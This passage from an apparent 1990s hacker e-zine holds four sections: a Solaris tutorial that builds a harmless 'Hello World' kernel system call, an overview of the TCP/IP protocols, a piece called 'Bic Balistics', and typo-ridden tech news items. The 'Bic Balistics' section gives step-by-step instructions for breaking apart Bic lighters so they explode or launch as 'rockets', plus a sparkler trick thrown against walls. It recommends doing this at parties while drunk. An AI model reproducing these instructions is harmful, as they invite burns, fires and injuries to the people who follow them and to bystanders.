with darker purposes in their little ugly minds, but let's admit it, anybody
that would be going at a kernel for cracking purposes would not be reading
this text.
So, I'll give you the benefit of the doubt and say you're doing it
out of curiosity. This said, let's go thru a small and incomplete overview of
the Solaris kernel.
The simplest way to look at the kernel is as a resource manager,
responsible for the allocation of critical and protected resources to the
processes that need them in a safe and sane way. These resources would be CPU
time, memory space,access to I/O devices, network handling, timers, the
real-time clock, interprocess communication (IPC) and other processes.
The CPU will then work in two modes: user and kernel mode. The
differences between them are that in user mode a process will use local data,
locally mapped files and a local stack. In kernel mode a process will be using
a shared image of the kernel - and every other process running in the system
will be using this image, so things are a bit slower here.
Every time we pass from user mode to kernel mode, or the other way
round, a context switch happens. This is one of the very expensive operations
that drag down performance, and this is the reason why most of today's
kernel writers do this part of the code in assembler.
But when do context switches happen ?
A user process moves from user mode to kernel mode each time a system
call is used.
System calls are function calls, like any other function, but they
all make use of syscall(3B) as the entry point into the kernel. From the
man page:

*****
SunOS/BSD Compatibility Library Functions syscall(3B)



NAME
syscall - indirect system call

SYNOPSIS
/usr/ucb/cc [ flag ... ] file ...

#include <sys/syscall.h>

int syscall(number, arg, ...)

DESCRIPTION
syscall() performs the function whose assembly language
interface has the specified number, and arguments arg ....
Symbolic constants for functions can be found in the header
<sys/syscall.h>.

RETURN VALUES
On error syscall() returns -1 and sets the external variable
errno (see intro(2)).

*****

A mapping between system call names and numbers can be found on
/etc/name_to_sysnum.


The System Call Mechanism
=========================

++++++++++++++
+user process+
++++++++++++++
|
system
call(X,....)
|
|
V User mode
-----------------------------------------------------------------
Kernel mode
sysent[X].sy_callc()
-----------------------------------------------------------------

All the information concerning system calls is defined in /usr/include
/sys/systm.h.
In that file we will find the definition of sysent:

struct sysent {
char sy_narg; /* total number of arguments */
char sy_flags; /* various flags as defined below */
int (*sy_call)(); /* argp, rvalp-style handler */
krwlock_t *sy_lock; /* lock for loadable system calls */
longlong_t (*sy_callc)(); /* C-style call hander or wrapper */
};

sy_narg has the number of arguments that the specific system call
needs. sy_flags is a bunch of flags meaning if this system call is loadable or
if it is completely loaded (more on this later), and if it can be unloaded,
or if it takes C-style arguments.
One of the nicest characteristics of Solaris is the ability to work
with loadable modules. Again, this is peanuts for the Linux community, but the
users of (normally) higher-end systems like Sparcs may see this as new.
Where does this link with system calls ?
Turns out that we can write our own system calls and put them into
the kernel almost easily. Let's see a simple example, a system call that prints
"Hello World".

First of all, take a look at /etc/name_to_sysnum:

(.....)
mount 21
umount 22
setuid 23
getuid 24
stime 25
alarm 27
fstat 28
pause 29
(.....)

Look for an unused entry. There are 210 entries, so you got 44 to
choose. I like 180.
Edit the file and add a line with the name of your system call:

mySyscall 180

Save the file and reboot the system. This is necessary so that the
kernel will read this file and allocate memory space as needed to accomodate
the new system call.

Ok. Now the source code. Call this file mySyscall.c:

---------------8<-----------------------8<--------------------8<-------------

/* these are all the includes normally needed to a general sys call -
we don't use many of them, but this is the normal load you'll see
on a more evolved syscall */

#include <sys/types.h>
#include <sys/vnode.h>
#include <sys/file.h>
#include <sys/cred.h>
#include <sys/stropts.h>
#include <sys/systm.h>
#include <sys/pathname.h>
#include <sys/exec.h>
#include <sys/thread.h>
#include <errno.h>
#include <sys/modctl.h>
#include <sys/syscall.h>

/* our entry point */
static int mySyscall();

static struct sysent mySysent = {
0, /* number of arguments */
0, /* load flags */
mySyscall, /* the function */
(krwlock_t *) NULL /* kernel lock */
};

/* this is the dynamic load & link stuff. It is sort of fill-in-the-blanks
and seems to be standard for all system calls */

extern struct mod_ops mod_syscallops;

static struct modlsys modlsys = {
&mod_syscallops, /* define loader routines */
"My little system call", /* decsriptive string */
&mySysent /* pointer to our sysent structure */
};

static struct modlinkage modlinkage = {
MODREV_1, /* loader revision number */
(void *) &modlsys, /* start of list of things to load here */
0 /* end of list */
};
/* end of dynamic load stuff */

/* this is a counter on the instances of the loaded call. this is needed
in case we want to unload but it is still in use, or something. notice
that it is static on purpose */

static int refcnt = 0;

/* this little routine is the load entry point. when we instruct the
system to load our loadable system call, the kernel will call this
function - so, if you need any initialization done, here is the place
for it */

_init()
{
printf("MY SYSTEM CALL INITIALIZED\n");
return (mod_install(&modlinkage));
}

/* here we do the opposite of _init, and deallocate any resources we may have
been using before unloading the system call code */

_fini()
{
/* in case we ask to have the syscall unloaded while it is still
in use, we refuse the download with a BUSY return code */

if (refcnt != 0)
return (EBUSY);

printf("MY SYSTEM CALL REMOVED\n");
return (mod_remove(&modlinkage));
}

/* tools like modinfo will return information about loadable modules
installed. this answers to those requests. */

_info(struct modinfo *modinfop)
{
printf("REQUEST INFO ABOUT MY SYSTEM CALL\n");
return (mod_info(&modlinkage, modinfop));
}

/* here we do the real magic. one work of advice concerning which functions
you can use here - anything that compiles without an explicit library
addition will do just fine */

mySyscall()
{
printf("Hello World!\n");
return(0);
}

------------------8<-------------------8<------------------8<--------------

Ok, now on to compile this little gem: as root (what, you don't have
root ? what, you thought this article was MEANT to GIVE you r00t ? you w0rm),
do:
gcc -D_KERNEL -c mySyscall.c
ld -r -o mySyscall mySyscall.o

You'll get a file called mySyscall.

We will also need a small test program. Compile this one:

------------------------8<------------------------8<-----------------------
#include <sys/syscall.h>

int main(int argc, char **argv)
{
i = syscall(180);
}
------------------------8<------------------------8<-----------------------

Call it whatever you want. Now, as root, open a window with a
running tail of /var/adm/messages. All of our messages will be printed here,
or in a console window if you happen to have one (you can also open a
xconsole).
Do:

modload mySyscall

If you get something like "can't load module: Out of memory or no room
in system tables"
, it means you forgot to reboot the system after changing
/etc/name_to_sysnum. Do it and let's try again.

In the xconsole or in the message file you'll see two lines, with the
messages of our _info and _init routines. Now run 'modinfo', and see that you
get the call info and a printf on the console.
Run the test program a couple of times. Notice that the "Hello World"
gets printed as you run the test program.
Now, using the index number from modinfo, do 'modunload -i N' where
N is the module id that modinfo gave you. Notice that the _fini string is
printed. The module is gone from your kernel.

That's it for today. Now, I suppose you want to go and play with your
new gained knowledge. Do it, nothing will break, the next boot will clean
everything....I hope. Next time we will discuss adb,kadb and how to debug
these modules, and perhaps how to filter a system call to do nice things to
the host.



-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
MessageID: gnt/Vb5XuX/pKAH8eKi/X8zyFbHIlgUB

iQA/AwUBNj19+AfcIY8lw9gyEQIW/ACgs02dG9p+KwffhkMiaIJiIGZKzAoAnAjp
Hd4y+Ja6jgItQHY7LZVFQwmw
=jTbt
-----END PGP SIGNATURE-----




---------------------------------------------------------------------------
The Internet Protocol Suite m0f0
---------------------------------------------------------------------------


A network is a configuration of machines that exchange information among
them. In order for the network to function properly, the information
originating at a sender must be transmitted along a communication line and
delivered to the intended recipient in an intelligible form. Because different
types of networking software and hardware need to interact to perform this
function, network designers developed the concept of the communications
protocol family (or suite). A network protocol is a set of formal rules
explaining how software and hardware should interact within a network in order
to transmit information. The Internet Protocol (IP) family is one such group
of network protocols. It is centered around the IP. The other members of the
IP family are Transmission Control Protocol (TCP, User Datagram Protocol
(UDP), Address Resolution Protocol (ARP), Reverse Address Resolution Protocol
(RARP), and Internet Control Message Protocol (ICMP).

The entire family is popularly referred to as TCP/IP, reflecting the name
of the two main protocols.TCP/IP provides services to many different
types of host machines connected to heterogeneous networks. These networks
may be wide area networks, such as X.25-base networks, but they also can be
local area networks, such as one you might install in a single building.

Note: TCP/IP was originally developed by the United States Department
of Defense to run on the ARPANET, a packet-switching wide area network first
demonstrated in 1972. Today the ARPANET is part of a wide area network known
as the DoD (Department of Defense) Internet, or, for short, the Internet.
Many popular texts use the term Internet to describe both the protocol
family and the wide area network.

The TCP/IP protocol structure can be conceptualized as being formed of a
series of layers as shown below.

Layer Network Services
Application Telnet, FTP, TFTP
Transport TCP, UDP
Network IP, ICMP
Data Link ARP, RARP, device driver (such as Ethernet)
Physical Cable or other device (such as Ethernet board)

In TCP/IP jargon, a machine engaged in communication is termed either a
sending or receiving host. Every protocol layer on the sending host has its
peer protocol layer on the receiving host. Each layer is required by design
to handle communications in a predetermined fashion.

Each protocol formats communicated data and appends or removes information
from it. The protocol then passes the data to a lower layer on the sending
host or a higher layer on the receiving host.

Physical Layer

The Physical Layer is the hardware level of the protocol model, which is
concerned with electronic signals. Physical Layer protocols send and receive
data in the form of packets. A packet contains a source address, the
transmission itself, and a destination address.

TCP/IP supports a number of Physical Layer protocols, including Ethernet
and Token Ring. Ethernet is an example of a packet switching network; its
communications channels are occupied only for the duration of the
transmission of a packet. The telephone network is an example of a
circuit-switching network.

Data Link Layer

The Data Link Layer is concerned with addressing at the physical machine
level. Protocols at this layer are involved with communications
controllers, their chips, and their buffers. Ethernet is supported at this
layer by TCP/IP.

Two additional TCP/IP protocols, ARP and RARP, can be viewed as existing
between the network and data link layers. ARP is the Ethernet Address
Resolution Protocol. It maps known IP addresses (32 bits long) to Ethernet
addresses (48 bits long). RARP (or Reverse ARP) is the IP Address Resolution
Protocol. It maps known Ethernet addresses (48 bits) to IP addresses (32
bits), the reverse of ARP.

Network Layer

Internet Protocol (IP) and Internet Control Message Protocol (ICMP) are
the protocols present at the Network Layer.IP provides machine-to-machine
communication. It performs transmission routing by determining the path a
transmission must take, based on the receiving machine’s IP address. IP also
provides transmission-formatting services; it assembles data for transmission
into an Internet datagram. If the datagram is outgoing (received from the
higher layer protocols), IP attaches an IP header to it. This header contains
a number of parameters, including the IP addresses of the sending and
receiving hosts.

ICMP sends error or control messages to other hosts. It provides communication of Internet software between machines.

Transport Layer

The TCP/IP Transport Layer protocols enable communications between
processes running on separate machines. Protocols at this level are TCP
and UDP.

Transmission Control Protocol (TCP) enables applications to talk to each
other via virtual circuits, as thought they had a physical circuit between
them. TCP is a connection-oriented, reliable protocol; any data written to
a TCP connection will be received by its peer in sequence, or an error
indication will be returned.

User Datagram Protocol (UDP) is the alternative protocol available at
the Transport Layer. UDP is a connectionless datagram protocol. Datagrams
are groups of information transmitted as a unit to and from the upper layer
protocols on sending and receiving hosts. UDP datagrams use port numbers to
specify sending and receiving processes. However, no attempt is made to
recover from failure or loss; packets may be lost with no error indication
returned.

Whether TCP or UDP is used depends on the network applications invoked by
the user. For example, if the user invokes telnet, that application passes
the user’s request to TCP. If the user’s request involves the Domain Name
Services, that application passes the request to UDP.

Application Layer

A variety of TCP/IP protocols exist at the Application Layer. Here is a
description of some of the more widely used:

telnet
The Telnet protocol enables terminals and terminal-oriented processes to
communicate on a network running TCP/IP. It is implemented as the program
telnet on the local machine and the daemon telnetd on the remote machine.
Telnet provides a user interface through which two hosts can open
communications with each other, then send information on a
character-by-character or line-by-line basis. The application includes a
series of commands.

The telnetd daemon on the remote host handles requests from the telnet
command.

ftp
The File Transport Protocol (FTP) transfers files to and from a remote
network. The protocol includes the ftp command on the local machine and
ftpd daemon on the remote machine. ftp lets you specify on the command line the
host with whom you want to initiate file transfer and options for
transferring the file. The ftpd daemon on the remote host handles the
requests from your ftp command.

tftp
The Trivial File Transfer Protocol (TFTP) enables users to transfer files
to and from a remote machine. Like ftp, tftp is implemented as a program on
the local machine and as a daemon (tftpd) on the remote machine. tftp
invokes a command interpreter for transferring files and maintains a
connection between two machines between file transfers.

Domain Name Service
The Domain Name Service (DNS) is a protocol that provides domain-name-to-
address-mapping of forwarding hosts and mail recipients on a network.

Other application layer protocols exist that are also implemented as a
program on the local machine and a daemon on the remote one; examples of
these are rlogin and rlogind. Which permit a user to log in to a remote
machine; rsh and rshd which enable the user to spawn a shell on a remote
machine, and finger and fingerd, which permit a user to obtain information
about users on remote machines.

To avoid the need to have an excess of daemons running all times the
daemon inetd is initiated at start-up time. After consulting the
/etc/inetd.conf file, inetd runs appropriate daemons as needed. For example,
the daemon rlogind will be run by inetd whenever there is a request for a
remote login from another machine, and only at that time and for the
duration of the remote login.

m0f0


---------------------------------------------------------------------------
Bic Balistics -Anarchy Nitro
---------------------------------------------------------------------------


INTRODUCTION:

I'm sure all of you are familiar with the Bic lighter, and I'm also sure
you've tried to make the Bic Flamethrower at one time or another. Well...
here's 2 more things you can do, First off is the Bic Rocket, and then the
Bic Sparkler. Both work almost every time! Enjoy...

MATERIALS NEEDED:

2 or more Bic lighters (the big kind)
1 large open parkinglot with noncombustible material surrounding it

DIAGRAM:

- NORMAL TOP AND SIDE - - TOP AND SIDE, FLME BLOCKER REMOVED -

Flame |Flame Blocker /=========\ Striker
\ __ | ___ // \ /
+_/__|<-+->|_+_| ||M +_O==

  
<-+ .0.
|:....| | | ||A |:....| | | |
| : | | | ||G | : | | | |
| : | | | ||N | : | | | |
Fuel --->| : |<-+ | | ||I | : | | | |
Area 1 | : | | | | ||F | : | | | |
|__:__| | |___| ||Y |__:__| | |___|
| || |
|Fuel Area 2 // |Fuel Valve
//
__ //
Striker--> / \ <==========/
\__/
.
Flint--> I
#
Spring--> #

PREPARATION:

First, hit the back side of the flame blocker against something and break
it off. Take off the striker and get the spring and flint. Set them aside
somewhere safe for later use. Next pull off the Fuel Valve, and put your
fingure over the hole where the fuel comes out and shake it up. Leave your
fingure on the hole.

LAUNCHING:

Find someplace where you can lay the lighter so the bottom faces up. Set it
there, take the other lighter and light the rocket. It should burn just like
it normally does, except the flame should be melting the plastic. It melts
down to the fuel and... one of three things happens: It flies up into the air
and explodes (usually about 10-20 feet up), Skips along the ground, or just
explodes. It usually takes about 2 minutes for it to burn through the plastic.
What every you do, don't go back to the lighter after it's been burning for
more than 1 minute. And only go back if the flame went out!

BIC SPARKLER:

This isn't really a sparkler, but it sure is fun. Take the flint and the
spring you set aside from the rocket and wrap the flint in the spring, like
this, you pull the sprint, put the flint in the middle, like a plus sign, and
then twist the spring once so it looks like this:

Flint
\
||
."||". <- Spring
." ".
" "
Then hold it over the flame of the one lighter you have left until it starts
to wrinkle up or get red. Then throw it against a wall and whoosh, sparks fly
everywhere and there's a little char mark left on the wall.

CONCLUSION:

Enjoy these, they're lots of fun at parties when everyones drunk, the sparkler
is really trippy then. They are both best at night, but good during the day
as well.



---------------------------------------------------------------------------
News Bank Sources
---------------------------------------------------------------------------


**************|-*
* Telephony (mobile computing)
**************|-*



-----------------------------------------------------
3Com Unveils VPN Tunnel Switces
-----------------------------------------------------
3Com Corp. launched the Path Builder S500 series platofrms,
a family of purpose built Virtual Private Network (VPN) tunnel
switches that enables companies to mirgrate their existing
remote access and routed site to site networks to next-generation
VPNs. the switches allow enterprises to cut monthly costs on
remote access long distance or 800 numbers by 50 percent or more.
The Path Builder S500 family of tunnel switches was purpose
built to scale VPN networks to handle hundreds to thousands of
users and sites with wire-speed encrypted security.


-----------------------------------------------------
Ericsson Rejects Qualcomm Theat in U.S.-EU standards
-----------------------------------------------------


Swedish telecommunications quiment maker Eircsson says it
will retaliate if U.S. high-tech company Qualcomm Inc. does
not license key technologies to European rivals.






**************|-*
* Network (mordern advances)
**************|-*

-----------------------------------------------------
IBM, Intel Back New UNIX for All Intel Server Systems
-----------------------------------------------------

IBM Corp, Intel Corp. and other key players teamed up to develop a single UNIX
product product line for Intel's present 32-bit IA-32 chip-based systems, and future
64-bit IA-64 chip-based systems. Their announced aim is to produce a new single UNIX
line that will run acroos Intel microprocesser systems that range from entry level
servers to large enterprise environments. The two giants entered into a strategic
business agreement with UNIX systems design firm SCO Inc., of Sanata Cruz, CA.

Under the agreement, IBM will make SCO's UnixWare 7 it's 32-bit UNIX operating system
for the high-volunme Intel architecture enterpr

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT